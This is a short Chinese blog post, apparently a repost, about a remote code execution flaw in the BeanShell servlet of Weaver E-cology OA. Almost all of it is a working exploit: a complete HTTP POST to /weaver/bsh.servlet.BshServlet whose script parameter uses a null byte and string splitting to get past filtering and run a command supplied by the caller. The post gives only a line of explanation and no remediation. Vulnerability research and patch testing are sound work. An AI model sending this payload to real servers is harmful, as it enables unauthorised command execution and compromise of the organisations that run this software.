码迷,mamicode.com
首页 > 其他好文 > 详细

泛微E-cology OA /weaver/ 代码执行漏洞

时间:2019-09-22 12:45:58      阅读:118      评论:0      收藏:0      [点我收藏+]

标签:val   apn   get   and   shell   div   content   bsp   signed   

泛微E-cology OA /weaver/代码执行漏洞

泛微e-cology OA Beanshell组件远程代码执行

http://127.0.0.1/weaver/bsh.servlet.BshServlet

技术图片

 

 若存在如上页面,则用下面数据包进行测试。

 

POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host:127.0.0.1:8080
Content-Length: 151
Cache-Control: max-age=0
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=abc17Hyv4HXw_6_hyXo1w; testBanCookie=test
Connection: close

bsh.script=eval%00("ex"%2b"ec(bsh.httpServletRequest.getParameter(\"command\"))");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

技术图片

 

 

等有时间写个脚本。

 

泛微E-cology OA /weaver/ 代码执行漏洞

标签:val   apn   get   and   shell   div   content   bsp   signed   

原文地址:https://www.cnblogs.com/Oran9e/p/11566824.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!